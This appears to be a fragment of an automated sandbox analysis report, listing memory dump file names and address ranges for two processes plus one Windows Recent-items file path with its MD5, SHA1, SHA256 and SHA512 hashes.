memory/1628-3-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-4-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-8-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-9-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-7-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-5-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-6-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-13-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-14-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-15-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-17-0x00007FFE57E40000-0x00007FFE57E50000-memory.dmp

memory/1628-16-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-18-0x00007FFE57E40000-0x00007FFE57E50000-memory.dmp

memory/1628-12-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-11-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-10-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/408-33-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/408-35-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/408-36-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/408-37-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 20027ba84ae3f3642a88a2f6010f2f35
SHA1 3be4122787603891ca3baf5d2a8624ca8c5d9327
SHA256 baecfa0a690faa5ef8d323dbbde6974b69c02abc09819496040754d5071af9c8
SHA512 062b863625702d69cf4dddd8000ec3b6cd37a433de2ab37f7bb01a7f2b04e8b0004ca629df801f3737240ae649674d41d6af3c9fc2bed88a05f001151930c5d0

memory/408-47-0x00007FF7E8190000-0x00007FF7E8198000-memory.dmp

memory/1628-48-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-49-0x00007FFE9A58D000-0x00007FFE9A58E000-memory.dmp

memory/1628-51-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/408-52-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

memory/1628-79-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-78-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-80-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-81-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-82-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp